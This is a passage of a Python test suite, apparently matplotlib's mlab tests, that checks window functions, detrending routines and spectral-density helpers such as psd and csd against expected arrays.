def check_window_apply_repeat(self, x, window, NFFT, noverlap):
"""
This is an adaptation of the original window application algorithm.
        This is here to test that the new implementation gives the same
        result.
"""
step = NFFT - noverlap
ind = np.arange(0, len(x) - NFFT + 1, step)
n = len(ind)
result = np.zeros((NFFT, n))
if np.iterable(window):
windowVals = window
else:
windowVals = window(np.ones(NFFT, x.dtype))
# do the ffts of the slices
for i in range(n):
result[:, i] = windowVals * x[ind[i]:ind[i]+NFFT]
return result
def test_window_none_rand(self):
res = mlab.window_none(self.sig_ones)
assert_array_equal(res, self.sig_ones)
def test_window_none_ones(self):
res = mlab.window_none(self.sig_rand)
assert_array_equal(res, self.sig_rand)
def test_window_hanning_rand(self):
targ = np.hanning(len(self.sig_rand)) * self.sig_rand
res = mlab.window_hanning(self.sig_rand)
assert_allclose(targ, res, atol=1e-06)
def test_window_hanning_ones(self):
targ = np.hanning(len(self.sig_ones))
res = mlab.window_hanning(self.sig_ones)
assert_allclose(targ, res, atol=1e-06)
def test_apply_window_1D_axis1_ValueError(self):
x = self.sig_rand
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_1D_els_wrongsize_ValueError(self):
x = self.sig_rand
window = mlab.window_hanning(np.ones(x.shape[0]-1))
with pytest.raises(ValueError):
_apply_window(x, window)
def test_apply_window_0D_ValueError(self):
x = np.array(0)
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_3D_ValueError(self):
x = self.sig_rand[np.newaxis][np.newaxis]
window = mlab.window_hanning
with pytest.raises(ValueError):
_apply_window(x, window, axis=1, return_window=False)
def test_apply_window_hanning_1D(self):
x = self.sig_rand
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, return_window=True)
yt = window(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_1D_axis0(self):
x = self.sig_rand
window = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = window(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els_1D_axis0(self):
x = self.sig_rand
window = mlab.window_hanning(np.ones(x.shape[0]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = window1(x)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window(x[:, i])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els1_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning(np.ones(x.shape[0]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=0, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window1(x[:, i])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_els2_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, axis=0, return_window=True)
yt = np.zeros_like(x)
for i in range(x.shape[1]):
yt[:, i] = window1*x[:, i]
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_els3_2D_axis0(self):
x = np.random.standard_normal([1000, 10]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[0]))
y, window2 = _apply_window(x, window, axis=0, return_window=True)
yt = _apply_window(x, window1, axis=0, return_window=False)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_2D_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
y = _apply_window(x, window, axis=1, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window(x[i, :])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_els1_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning(np.ones(x.shape[1]))
window1 = mlab.window_hanning
y = _apply_window(x, window, axis=1, return_window=False)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window1(x[i, :])
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_els2_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[1]))
y, window2 = _apply_window(x, window, axis=1, return_window=True)
yt = np.zeros_like(x)
for i in range(x.shape[0]):
yt[i, :] = window1 * x[i, :]
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
assert_array_equal(window1, window2)
def test_apply_window_hanning_2D_els3_axis1(self):
x = np.random.standard_normal([10, 1000]) + 100.
window = mlab.window_hanning
window1 = mlab.window_hanning(np.ones(x.shape[1]))
y = _apply_window(x, window, axis=1, return_window=False)
yt = _apply_window(x, window1, axis=1, return_window=False)
assert yt.shape == y.shape
assert x.shape == y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_stride_windows_hanning_2D_n13_noverlapn3_axis0(self):
x = self.sig_rand
window = mlab.window_hanning
yi = mlab.stride_windows(x, n=13, noverlap=2, axis=0)
y = _apply_window(yi, window, axis=0, return_window=False)
yt = self.check_window_apply_repeat(x, window, 13, 2)
assert yt.shape == y.shape
assert x.shape != y.shape
assert_allclose(yt, y, atol=1e-06)
def test_apply_window_hanning_2D_stack_axis1(self):
ydata = np.arange(32)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
result = _apply_window(ydata, mlab.window_hanning, axis=1,
return_window=False)
assert_allclose(ycontrol, result, atol=1e-08)
def test_apply_window_hanning_2D_stack_windows_axis1(self):
ydata = np.arange(32)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
result = _apply_window(ydata, mlab.window_hanning, axis=1,
return_window=False)
assert_allclose(ycontrol, result, atol=1e-08)
def test_apply_window_hanning_2D_stack_windows_axis1_unflatten(self):
n = 32
ydata = np.arange(n)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = _apply_window(ydata1, mlab.window_hanning)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydata = ydata.flatten()
ydata1 = mlab.stride_windows(ydata, 32, noverlap=0, axis=0)
result = _apply_window(ydata1, mlab.window_hanning, axis=0,
return_window=False)
assert_allclose(ycontrol.T, result, atol=1e-08)
class TestDetrend:
def setup(self):
np.random.seed(0)
n = 1000
x = np.linspace(0., 100, n)
self.sig_zeros = np.zeros(n)
self.sig_off = self.sig_zeros + 100.
self.sig_slope = np.linspace(-10., 90., n)
self.sig_slope_mean = x - x.mean()
sig_rand = np.random.standard_normal(n)
sig_sin = np.sin(x*2*np.pi/(n/100))
sig_rand -= sig_rand.mean()
sig_sin -= sig_sin.mean()
self.sig_base = sig_rand + sig_sin
self.atol = 1e-08
def test_detrend_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend_none(input)
assert input == targ
def test_detrend_none_0D_zeros_axis1(self):
input = 0.
targ = input
mlab.detrend_none(input, axis=1)
assert input == targ
def test_detrend_str_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend(input, key='none')
assert input == targ
def test_detrend_detrend_none_0D_zeros(self):
input = 0.
targ = input
mlab.detrend(input, key=mlab.detrend_none)
assert input == targ
def test_detrend_none_0D_off(self):
input = 5.5
targ = input
mlab.detrend_none(input)
assert input == targ
def test_detrend_none_1D_off(self):
input = self.sig_off
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_slope(self):
input = self.sig_slope
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_base(self):
input = self.sig_base
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_1D_base_slope_off_list(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = input.tolist()
res = mlab.detrend_none(input.tolist())
assert res == targ
def test_detrend_none_2D(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
input = np.vstack(arri)
targ = input
res = mlab.detrend_none(input)
assert_array_equal(res, targ)
def test_detrend_none_2D_T(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
input = np.vstack(arri)
targ = input
res = mlab.detrend_none(input.T)
assert_array_equal(res.T, targ)
def test_detrend_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend_mean(input)
assert_almost_equal(res, targ)
def test_detrend_str_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend(input, key='mean')
assert_almost_equal(res, targ)
def test_detrend_detrend_mean_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_mean)
assert_almost_equal(res, targ)
def test_detrend_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend_mean(input)
assert_almost_equal(res, targ)
def test_detrend_str_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key='mean')
assert_almost_equal(res, targ)
def test_detrend_detrend_mean_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_mean)
assert_almost_equal(res, targ)
def test_detrend_mean_1D_zeros(self):
input = self.sig_zeros
targ = self.sig_zeros
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base(self):
input = self.sig_base
targ = self.sig_base
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_off(self):
input = self.sig_base + self.sig_off
targ = self.sig_base
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_slope(self):
input = self.sig_base + self.sig_slope
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_mean_1D_base_slope_off(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_axis0(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input, axis=0)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_list(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input.tolist())
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_1D_base_slope_off_list_axis0(self):
input = self.sig_base + self.sig_slope + self.sig_off
targ = self.sig_base + self.sig_slope_mean
res = mlab.detrend_mean(input.tolist(), axis=0)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_2D_default(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_mean_2D_none(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=None)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_none_T(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri).T
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=None)
assert_allclose(res.T, targ,
atol=1e-08)
def test_detrend_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend_mean(input, axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_axis1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_mean_2D_axism1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend_mean(input, axis=-1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_2D_default(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_2D_none(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, axis=None)
assert_allclose(res, targ, atol=1e-08)
def test_detrend_str_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key='mean', axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_str_constant_2D_none_T(self):
arri = [self.sig_off,
self.sig_base + self.sig_off]
arrt = [self.sig_zeros,
self.sig_base]
input = np.vstack(arri).T
targ = np.vstack(arrt)
res = mlab.detrend(input, key='constant', axis=None)
assert_allclose(res.T, targ,
atol=1e-08)
def test_detrend_str_default_2D_axis1(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key='default', axis=1)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_detrend_mean_2D_axis0(self):
arri = [self.sig_base,
self.sig_base + self.sig_off,
self.sig_base + self.sig_slope,
self.sig_base + self.sig_off + self.sig_slope]
arrt = [self.sig_base,
self.sig_base,
self.sig_base + self.sig_slope_mean,
self.sig_base + self.sig_slope_mean]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key=mlab.detrend_mean, axis=0)
assert_allclose(res, targ,
atol=1e-08)
def test_detrend_bad_key_str_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, key='spam')
def test_detrend_bad_key_var_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, key=5)
def test_detrend_mean_0D_d0_ValueError(self):
input = 5.5
with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=0)
def test_detrend_0D_d0_ValueError(self):
input = 5.5
with pytest.raises(ValueError):
mlab.detrend(input, axis=0)
def test_detrend_mean_1D_d1_ValueError(self):
input = self.sig_slope
with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=1)
def test_detrend_1D_d1_ValueError(self):
input = self.sig_slope
with pytest.raises(ValueError):
mlab.detrend(input, axis=1)
def test_detrend_mean_2D_d2_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend_mean(input, axis=2)
def test_detrend_2D_d2_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend(input, axis=2)
def test_detrend_linear_0D_zeros(self):
input = 0.
targ = 0.
res = mlab.detrend_linear(input)
assert_almost_equal(res, targ)
def test_detrend_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend_linear(input)
assert_almost_equal(res, targ)
def test_detrend_str_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key='linear')
assert_almost_equal(res, targ)
def test_detrend_detrend_linear_0D_off(self):
input = 5.5
targ = 0.
res = mlab.detrend(input, key=mlab.detrend_linear)
assert_almost_equal(res, targ)
def test_detrend_linear_1d_off(self):
input = self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope(self):
input = self.sig_slope
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_str_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend(input, key='linear')
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend(input, key=mlab.detrend_linear)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_1d_slope_off_list(self):
input = self.sig_slope + self.sig_off
targ = self.sig_zeros
res = mlab.detrend_linear(input.tolist())
assert_allclose(res, targ, atol=self.atol)
def test_detrend_linear_2D_ValueError(self):
input = self.sig_slope[np.newaxis]
with pytest.raises(ValueError):
mlab.detrend_linear(input)
def test_detrend_str_linear_2d_slope_off_axis0(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key='linear', axis=0)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off_axis1(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri).T
targ = np.vstack(arrt).T
res = mlab.detrend(input, key=mlab.detrend_linear, axis=0)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_str_linear_2d_slope_off_axis0_notranspose(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key='linear', axis=1)
assert_allclose(res, targ, atol=self.atol)
def test_detrend_detrend_linear_1d_slope_off_axis1_notranspose(self):
arri = [self.sig_off,
self.sig_slope,
self.sig_slope + self.sig_off]
arrt = [self.sig_zeros,
self.sig_zeros,
self.sig_zeros]
input = np.vstack(arri)
targ = np.vstack(arrt)
res = mlab.detrend(input, key=mlab.detrend_linear, axis=1)
assert_allclose(res, targ, atol=self.atol)
@pytest.mark.parametrize('iscomplex', [False, True],
ids=['real', 'complex'], scope='class')
@pytest.mark.parametrize('sides', ['onesided', 'twosided', 'default'],
scope='class')
@pytest.mark.parametrize(
'fstims,len_x,NFFT_density,nover_density,pad_to_density,pad_to_spectrum',
[
([], None, -1, -1, -1, -1),
([4], None, -1, -1, -1, -1),
([4, 5, 10], None, -1, -1, -1, -1),
([], None, None, -1, -1, None),
([], None, -1, -1, None, None),
([], None, None, -1, None, None),
([], 1024, 512, -1, -1, 128),
([], 256, -1, -1, 33, 257),
([], 255, 33, -1, -1, None),
([], 256, 128, -1, 256, 256),
([], None, -1, 32, -1, -1),
],
ids=[
'nosig',
'Fs4',
'FsAll',
'nosig_noNFFT',
'nosig_nopad_to',
'nosig_noNFFT_no_pad_to',
'nosig_trim',
'nosig_odd',
'nosig_oddlen',
'nosig_stretch',
'nosig_overlap',
],
scope='class')
class TestSpectral:
@pytest.fixture(scope='class', autouse=True)
def stim(self, request, fstims, iscomplex, sides, len_x, NFFT_density,
nover_density, pad_to_density, pad_to_spectrum):
Fs = 100.
x = np.arange(0, 10, 1 / Fs)
if len_x is not None:
x = x[:len_x]
# get the stimulus frequencies, defaulting to None
fstims = [Fs / fstim for fstim in fstims]
# get the constants, default to calculated values
if NFFT_density is None:
NFFT_density_real = 256
elif NFFT_density < 0:
NFFT_density_real = NFFT_density = 100
else:
NFFT_density_real = NFFT_density
if nover_density is None:
nover_density_real = 0
elif nover_density < 0:
nover_density_real = nover_density = NFFT_density_real // 2
else:
nover_density_real = nover_density
if pad_to_density is None:
pad_to_density_real = NFFT_density_real
elif pad_to_density < 0:
pad_to_density = int(2**np.ceil(np.log2(NFFT_density_real)))
pad_to_density_real = pad_to_density
else:
pad_to_density_real = pad_to_density
if pad_to_spectrum is None:
pad_to_spectrum_real = len(x)
elif pad_to_spectrum < 0:
pad_to_spectrum_real = pad_to_spectrum = len(x)
else:
pad_to_spectrum_real = pad_to_spectrum
if pad_to_spectrum is None:
NFFT_spectrum_real = NFFT_spectrum = pad_to_spectrum_real
else:
NFFT_spectrum_real = NFFT_spectrum = len(x)
nover_spectrum = 0
NFFT_specgram = NFFT_density
nover_specgram = nover_density
pad_to_specgram = pad_to_density
NFFT_specgram_real = NFFT_density_real
nover_specgram_real = nover_density_real
if sides == 'onesided' or (sides == 'default' and not iscomplex):
# frequencies for specgram, psd, and csd
# need to handle even and odd differently
if pad_to_density_real % 2:
freqs_density = np.linspace(0, Fs / 2,
num=pad_to_density_real,
endpoint=False)[::2]
else:
freqs_density = np.linspace(0, Fs / 2,
num=pad_to_density_real // 2 + 1)
# frequencies for complex, magnitude, angle, and phase spectrums
# need to handle even and odd differently
if pad_to_spectrum_real % 2:
freqs_spectrum = np.linspace(0, Fs / 2,
num=pad_to_spectrum_real,
endpoint=False)[::2]
else:
freqs_spectrum = np.linspace(0, Fs / 2,
num=pad_to_spectrum_real // 2 + 1)
else:
# frequencies for specgram, psd, and csd
            # need to handle even and odd differently
if pad_to_density_real % 2:
freqs_density = np.linspace(-Fs / 2, Fs / 2,
num=2 * pad_to_density_real,
endpoint=False)[1::2]
else:
freqs_density = np.linspace(-Fs / 2, Fs / 2,
num=pad_to_density_real,
endpoint=False)
# frequencies for complex, magnitude, angle, and phase spectrums
# need to handle even and odd differently
if pad_to_spectrum_real % 2:
freqs_spectrum = np.linspace(-Fs / 2, Fs / 2,
num=2 * pad_to_spectrum_real,
endpoint=False)[1::2]
else:
freqs_spectrum = np.linspace(-Fs / 2, Fs / 2,
num=pad_to_spectrum_real,
endpoint=False)
freqs_specgram = freqs_density
# time points for specgram
t_start = NFFT_specgram_real // 2
t_stop = len(x) - NFFT_specgram_real // 2 + 1
t_step = NFFT_specgram_real - nover_specgram_real
t_specgram = x[t_start:t_stop:t_step]
if NFFT_specgram_real % 2:
t_specgram += 1 / Fs / 2
if len(t_specgram) == 0:
t_specgram = np.array([NFFT_specgram_real / (2 * Fs)])
t_spectrum = np.array([NFFT_spectrum_real / (2 * Fs)])
t_density = t_specgram
y = np.zeros_like(x)
for i, fstim in enumerate(fstims):
y += np.sin(fstim * x * np.pi * 2) * 10**i
if iscomplex:
y = y.astype('complex')
# Interestingly, the instance on which this fixture is called is not
# the same as the one on which a test is run. So we need to modify the
# class itself when using a class-scoped fixture.
cls = request.cls
cls.Fs = Fs
cls.sides = sides
cls.fstims = fstims
cls.NFFT_density = NFFT_density
cls.nover_density = nover_density
cls.pad_to_density = pad_to_density
cls.NFFT_spectrum = NFFT_spectrum
cls.nover_spectrum = nover_spectrum
cls.pad_to_spectrum = pad_to_spectrum
cls.NFFT_specgram = NFFT_specgram
cls.nover_specgram = nover_specgram
cls.pad_to_specgram = pad_to_specgram
cls.t_specgram = t_specgram
cls.t_density = t_density
cls.t_spectrum = t_spectrum
cls.y = y
cls.freqs_density = freqs_density
cls.freqs_spectrum = freqs_spectrum
cls.freqs_specgram = freqs_specgram
cls.NFFT_density_real = NFFT_density_real
def check_freqs(self, vals, targfreqs, resfreqs, fstims):
assert resfreqs.argmin() == 0
assert resfreqs.argmax() == len(resfreqs)-1
assert_allclose(resfreqs, targfreqs, atol=1e-06)
for fstim in fstims:
i = np.abs(resfreqs - fstim).argmin()
assert vals[i] > vals[i+2]
assert vals[i] > vals[i-2]
def check_maxfreq(self, spec, fsp, fstims):
# skip the test if there are no frequencies
if len(fstims) == 0:
return
# if twosided, do the test for each side
if fsp.min() < 0:
fspa = np.abs(fsp)
zeroind = fspa.argmin()
self.check_maxfreq(spec[:zeroind], fspa[:zeroind], fstims)
self.check_maxfreq(spec[zeroind:], fspa[zeroind:], fstims)
return
fstimst = fstims[:]
spect = spec.copy()
        # go through each stimulus and check that it produces the current maximum peak
while fstimst:
maxind = spect.argmax()
maxfreq = fsp[maxind]
assert_almost_equal(maxfreq, fstimst[-1])
del fstimst[-1]
spect[maxind-5:maxind+5] = 0
def test_spectral_helper_raises(self):
# We don't use parametrize here to handle ``y = self.y``.
for kwargs in [ # Various error conditions:
{"y": self.y+1, "mode": "complex"}, # Modes requiring ``x is y``.
{"y": self.y+1, "mode": "magnitude"},
{"y": self.y+1, "mode": "angle"},
{"y": self.y+1, "mode": "phase"},
{"mode": "spam"}, # Bad mode.
{"y": self.y, "sides": "eggs"}, # Bad sides.
{"y": self.y, "NFFT": 10, "noverlap": 20}, # noverlap > NFFT.
{"NFFT": 10, "noverlap": 10}, # noverlap == NFFT.
{"y": self.y, "NFFT": 10,
"window": np.ones(9)}, # len(win) != NFFT.
]:
with pytest.raises(ValueError):
mlab._spectral_helper(x=self.y, **kwargs)
@pytest.mark.parametrize('mode', ['default', 'psd'])
def test_single_spectrum_helper_unsupported_modes(self, mode):
with pytest.raises(ValueError):
mlab._single_spectrum_helper(x=self.y, mode=mode)
@pytest.mark.parametrize("mode, case", [
("psd", "density"),
("magnitude", "specgram"),
("magnitude", "spectrum"),
])
def test_spectral_helper_psd(self, mode, case):
freqs = getattr(self, f"freqs_{case}")
spec, fsp, t = mlab._spectral_helper(
x=self.y, y=self.y,
NFFT=getattr(self, f"NFFT_{case}"),
Fs=self.Fs,
noverlap=getattr(self, f"nover_{case}"),
pad_to=getattr(self, f"pad_to_{case}"),
sides=self.sides,
mode=mode)
assert_allclose(fsp, freqs, atol=1e-06)
assert_allclose(t, getattr(self, f"t_{case}"), atol=1e-06)
assert spec.shape[0] == freqs.shape[0]
assert spec.shape[1] == getattr(self, f"t_{case}").shape[0]
def test_csd(self):
freqs = self.freqs_density
spec, fsp = mlab.csd(x=self.y, y=self.y+1,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
def test_csd_padding(self):
"""Test zero padding of csd()."""
if self.NFFT_density is None: # for derived classes
return
sargs = dict(x=self.y, y=self.y+1, Fs=self.Fs, window=mlab.window_none,
sides=self.sides)
spec0, _ = mlab.csd(NFFT=self.NFFT_density, **sargs)
spec1, _ = mlab.csd(NFFT=self.NFFT_density*2, **sargs)
assert_almost_equal(np.sum(np.conjugate(spec0)*spec0).real,
np.sum(np.conjugate(spec1/2)*spec1/2).real)
def test_psd(self):
freqs = self.freqs_density
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert spec.shape == freqs.shape
self.check_freqs(spec, freqs, fsp, self.fstims)
@pytest.mark.parametrize(
'make_data, detrend',
[(np.zeros, mlab.detrend_mean), (np.zeros, 'mean'),
(np.arange, mlab.detrend_linear), (np.arange, 'linear')])
def test_psd_detrend(self, make_data, detrend):
if self.NFFT_density is None:
return
ydata = make_data(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ydata = np.vstack([ydata1, ydata2])
ydata = np.tile(ydata, (20, 1))
ydatab = ydata.T.flatten()
ydata = ydata.flatten()
ycontrol = np.zeros_like(ydata)
spec_g, fsp_g = mlab.psd(x=ydata,
NFFT=self.NFFT_density,
